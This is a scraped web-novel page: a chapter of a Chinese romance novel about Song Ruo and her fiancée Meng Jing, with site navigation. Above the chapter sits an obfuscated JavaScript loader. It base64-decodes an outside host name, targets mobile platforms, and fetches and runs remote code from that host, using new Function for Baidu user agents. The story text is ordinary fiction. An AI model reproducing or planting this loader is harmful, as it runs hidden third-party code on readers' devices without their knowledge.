98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(63(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

当时她年纪还小,觉得这话莫名其妙,盛雪也和她吐槽过这句这些后现代作家哦,就爱用些吊诡的表达,以达到语出惊人的目的。

她将未婚妻一把拉过来,摁在身下,像卧在一朵软绵绵的云上。未婚妻对于这突然的袭击显然懵住了,抬手推了推她,可惜力气太小,推不动,她轻笑了一声,低下头缓缓逼近,未婚妻以为自己要吻她,闭上眼说不可以,而她却伸出舌尖,在未婚妻的泪痣上轻轻舔了一口,发出r的声响,这暧昧的动静刺激得未婚妻嘤了一声,宋若若的脸立马飞红了,绯色向下蔓延,大眼睛里出现朦胧的水雾,她微微眯着眼,扬起脸,鲜红欲滴的嘴唇像是静待采摘的熟樱桃

水流声打断了这一切。

水已经烧开了,未婚妻在倒水。

宋若看一眼安静得过分的鲸鱼,奇怪地问你脸红什么?

孟璟清了清嗓子,换了好两个动作,打死也不能让小药瓶知道自己在心里写黄文啊主角还是她。轻咳了两声,顾左右而言他老头子对你可真好。你知不知道,他什么都纵容我,就是这套房子,离学校又近,便利,楼下还有个桌球俱乐部,我那时候想练桌球,求了他好久,说要搬这来住,锻炼自己独立生活的能力,他就是不肯。你看现在,他二话不说就给你了。可见你才是他眼里的亲孙女儿。我不过是捡来的。

宋若抿嘴一笑你吃醋?

吃啊。孟璟哼了一声,你知不知道,自从认识了你,我就变成了个行走的醋罐子!

她说完这句,未婚妻不接话了,她也就收住话头。

宋若若动作娴雅,从水壶里倒水时不是单手拎着往下倒,还要另只手扶着壶身,好像怕壶受伤。给她也倒了一杯,放在她面前,再喝自己的水,喝水也很温柔,先吹吹凉,再一小口一小口啜饮,好像那不是普通的白开水,而是什么珍贵的灵泉,很珍惜的样子。低垂着睫毛,没有任何化妆,依旧唇红齿白。

对人对事这么爱惜的小药瓶子,为什么谈个恋爱这么别扭胆小,逃了又逃

未婚妻,问你个问题。

宋若抬眼看着她。孟璟从小地毯上爬过来,挨着她坐下,肩蹭着肩,你这么不愿意谈恋爱,老是临阵脱逃,是不是我在你说的那本书里,比个打引号的手势,做了什么极其不可原谅的事呀?

宋若从旁边拿过一个剧本,卷在手心,忽然又提起这个,她有点无所适从。

我是不是伤害过你?抹香鲸灵魂发问。

宋若意外地看着她。

真是啊,我怎么伤的?鲸鱼眼睛缓缓瞪大。

咫尺间的这面孔,是真诚在发问了。

宋若转过脸去,克制住,视线不要落在她的嘴唇上。身体也微不可察地挪开了一点距离。

孟璟眉头一挑,立刻发现了这个变化,勾着嘴角一笑,偏挪过去,继续挨着,还小声催促,说呀。

为什么突然这么问?宋若将那藕色封皮的电影剧本放回原处。

孟璟摇了摇头,不是突然。老婆离家出走这几天,我仔细想了想,从我们认识以来,我的表现虽然算不上优秀,可也勉强能拿个及格吧,而若若又是这么地善解人意,最重要的是明明也超级爱我!!可是你却一直跑,像奋力跑出羊圈的羊一样,好像我是个大灰狼,连和我试试的机会都不给。那就只有一种解释,我这个人在你心里本来的定位有问题。

宋若听着心里诧异起来。鲸不但相信穿书的说法,还洞悉了她的心理。她倒是很感激有人接受程度这样高,显得她并非什么神经病。

但那原剧情,没必要说,因为不能让鲸鱼为她还没做的事情负疚。

和剧情没有关系。她回过脸,打算也试试一本正经地胡说八道这个办法,其实是因为

因为?孟璟上身向前微倾。

我比你大。宋若端起杯子喝了一口水。

比我大?孟璟先一愣,继而绽放笑容难怪老说我没大没小!太好了,我喜欢年上的姐姐。就说嘛为什么老婆这么温柔,和学校里其他女生都不一样。

宋若再度被她逼到了死胡同,干脆一闭眼,促狭地问假如不是姐姐呢?

小阿姨?哇,那我岂不是可以放心撒娇了?

宋若无言地望着她。

小阿姨,我今晚不走了可不可以?鲸鱼探过脸来问,眼睛弯弯,想跟阿姨睡觉。

宋若木然拒绝不行。

鲸鱼往下一倒,倒在未婚妻的大腿上。

宋若

耳朵痒痒,阿姨帮我看看耳朵好不好?鲸鱼努努嘴。

宋若后悔跪坐的姿势了,两手提起来,对躺在自己身上的小孩完全无能为力。孟璟翻个身,脸贴着她的小肚子,把左耳朵亮出来。茶几的第二层就有棉签,她拿过一支,试图替她掏掏。干干净净的,根本没什么需要收拾。

可孟璟抱住她的腰,坚持说痒痒。

她只得再仔细检查一遍,连耳廓都没放过,说声好了。

鲸鱼立马又换了另一边,这边也要。

右耳朵也很干净。

都收拾好了。宋若拍拍她的脸。

这只大鲸鱼躺在那里,仍旧不肯动,双手搂着她的腰,侧过脸看她。

宋若提醒她起来啊。

我会快快长大的。她忽然正色说。

对于如此正经的孟璟,宋若还真不知道怎样面对。只能选择自己最不擅长的一种方式,插科打诨已经很大只了。

真的,鲸鱼目测一米七八。再长就只有超模一条路可以走了。

她不怎么好笑的笑话,鲸鱼也是捧场的,笑得露出小虎牙,我是说,我要成为很可靠的人,让老婆死心塌地地喜欢我。

当两个人都静默下来,也没有了烧热水的声音,墙壁上挂钟的存在感就陡然放大了。

秒针咔嚓咔嚓走了一圈后,孟璟松开未婚妻坐起了身,挽了挽头发,整理整理衣服站起来,低头看着地上懵懵的女孩子,我走啦。

好。

孟璟便拿过沙发上放着的包,挎好,走了两步又回头说老婆记得帮我选衣服。

宋若点点头,直到门砰地一声轻轻摔上,她才醒悟过来,孟璟说的是什么衣服。

第76章

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间